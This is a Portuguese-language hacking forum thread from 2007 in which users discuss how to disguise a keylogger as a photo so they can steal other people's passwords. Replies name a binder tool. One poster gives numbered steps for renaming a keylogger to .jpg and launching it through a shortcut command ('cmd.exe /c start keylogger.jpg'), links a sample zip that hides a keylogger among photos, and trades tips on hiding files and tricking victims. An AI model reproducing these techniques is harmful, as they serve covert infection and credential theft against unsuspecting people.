como colocar keylogger dentro de uma foto

Started by Anonymous, 16 de September , 2007, 10:50:49 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Anonymous

queria saber como colocar um keylogger dentro de uma foto...para pegar senha de outras pessoas!!!!!!obrigada!!!!!!!1

Anonymous

Olha o "Joiner" que o "eb0x" citou até hoje não encontrei nenhum que transformasse 2 Arquivos "1.Exe e  um qualquer em Arquivo.JPG" que funcione que não danifique as informações contidas nos arquivos...

MAs alguem aqui no forum deve ter alguma ferramenta quase neste tipo que faça isso sem danificar....

Nêmesis

afz, tipo ....

Não tem como deixar a extensão de um keylogger como .jpg, isto danificaria o KL ...
a única coisa referente ao assunto, da pra colocar uma foto no kl e tudo mais, porem a extensão sempre será .EXE ...

Agora pra você colocar uma foto deixando a extensão como .EXE é simples ... Binders como o CACTUS fazem isso sem problema algum (:

Mais sempre lembrando que não tem como deixar a extensão .JPG rsrsrs

pode ser que alguem venha te dizer que tem como, porém deve estar se referindo a estenografia !!

Té +

Anonymous

Era de uma explicação assim que gostaria que fosse postada...

Agora vou explicar quanto ao .JPG e .EXE

Tem um codigo que você altera o registro do Windows XP, que ele faz que o Windows entenda que o Arquivo.exe e um Arquivo.JPG...
Isso funciona em "Batch"...No momento não tenho o codigo quando arrumar ou se alguem tiver posta ai...

Blz :D

Nêmesis

Quote from: "killer.bat"Era de uma explicação assim que gostaria que fosse postada...
Agora vou explicar quanto ao .JPG e .EXE
Tem um codigo que você altera o registro do Windows XP, que ele faz que o Windows entenda que o Arquivo.exe e um Arquivo.JPG...
Isso funciona em "Batch"...No momento não tenho o codigo quando arrumar ou se alguem tiver posta ai...
Blz :P
acho que não seria muito útil .. hehehe

mais é isso ae cara este tópico talvez tenha sido até bom para esclarecermos algumas dúvidas referente ao assunto, kl pode ser um algo meio "lammer" para uns porém eu acho bem útil as vezes .. rsrsrs

Té +

Reeves

muda a extenção do .exe para .jpg
cria atalho para esse .jpg
na propriedades do atalho, modifica no Iniciar em:

%systemroot%\System32\cmd.exe /c start foto*.jpg

vai entender o .jpg como um .exe assim que abrir o atalho

era isso?
:P
  °vº   NÃO USE DROGAS,
/(_)\  USE GNU/LINUX
^ ^

Nêmesis

Quote from: "Reeves"muda a extenção do .exe para .jpg
cria atalho para esse .jpg
na propriedades do atalho, modifica no Iniciar em:
%systemroot%\System32\cmd.exe /c start foto*.jpg
vai entender o .jpg como um .exe assim que abrir o atalho
era isso?
:P

Reeves, não é isto não ... no caso você esta criando um atalho com a extensão .jpg que no caso quando é clickado ele direciona para o caminho no qual foi especificado o .exe e irá executa-lo, pq se fossemos mandar isto para alguma vitima teriamos de mandar o arquivo separado tambem e ainda qual vai ser o caminho dele no pc da vitima ?? mais é uma boa técnica para estudo também, se nao me engano li uma vez sobre essa parada do atalho.

mais 1 vez só pra lembrar: jamais um kl terá a extensão.jpg pois danificaria o código dele .. quem um dia ?? nada é possivel ..

Té +

Reeves

(...)

vo explica de novo:
e ainda dexa um .zip de exemplo.

1º - pega o keylogger.exe
2º - muda para keylogger.jpg
3º - cria um atalho para keylogger.jpg
4º - muda na propriedades do atalho, Iniciar em:
%systemroot%\System32\cmd.exe /c start keylogger.jpg

Finish.

dentro desse .zip
tem uma pasta com 5 fotos e 1 atalho
1 foto é o keylogger.

fiz uma amostra do que estou falando, por exemplo.
pasta de fotos ^^.. vão adorar as fotos*
mas não me culpem.

Download: http://www.2shared.com/file/2287630/73b ... eeves.html
só pos ilustrar o que to falando.
  °vº   NÃO USE DROGAS,
/(_)\  USE GNU/LINUX
^ ^

Reeves

°vº   NÃO USE DROGAS,
/(_)\  USE GNU/LINUX
^ ^

Anonymous

Nêmesis

Quote from: "Reeves"(...)
vo explica de novo:
e ainda dexa um .zip de exemplo.
1º - pega o keylogger.exe
2º - muda para keylogger.jpg
3º - cria um atalho para keylogger.jpg
4º - muda na propriedades do atalho, Iniciar em:
%systemroot%\System32\cmd.exe /c start keylogger.jpg
Finish.
dentro desse .zip
tem uma pasta com 5 fotos e 1 atalho
1 foto é o keylogger.
fiz uma amostra do que estou falando, por exemplo.
pasta de fotos ^^.. vão adorar as fotos*
mas não me culpem.
Download: http://www.2shared.com/file/2287630/73b ... eeves.html
só pos ilustrar o que to falando.

Blz cara foi exatamente o que eu tinha dito acima .. hehe

você criou um atalho que no caso quando clickado executa a foto "1378138909.jpg" .. ta blz cara bem legal esta técnica mais no caso de infectar alguem não seria muito útil porque iriamos ter de mandar o kl e depois o atalho e depois ainda você tem que digitar o caminho do kl na maquina da vitima que poderia ser /meus documentos/meus arquivos recebidos/kl.exe bla bla bla .. hehehe

mais é isso ae cara fica de exemplo ai esta técnica postada por ti ... vlws

Té +

Slinack

mas com engenharia social e se a vitima nao for muito ligada da pra usar pela extensão .exe :P

~ nemesis,
nao seria o caso de colocar numa pasta o kl de arquivo oculto e o atalho e depois compactar?

Reeves

°vº   NÃO USE DROGAS,
/(_)\  USE GNU/LINUX
^ ^

kmrafa

Tem aqueles que pode ser outras extensões, ou ate modifica o registro, e dai sim puxa o keylogger automatico hospedado na net e ja se auto instala com essa formatação.. jah vi isso uma vez mais n sei agora como funciona direito..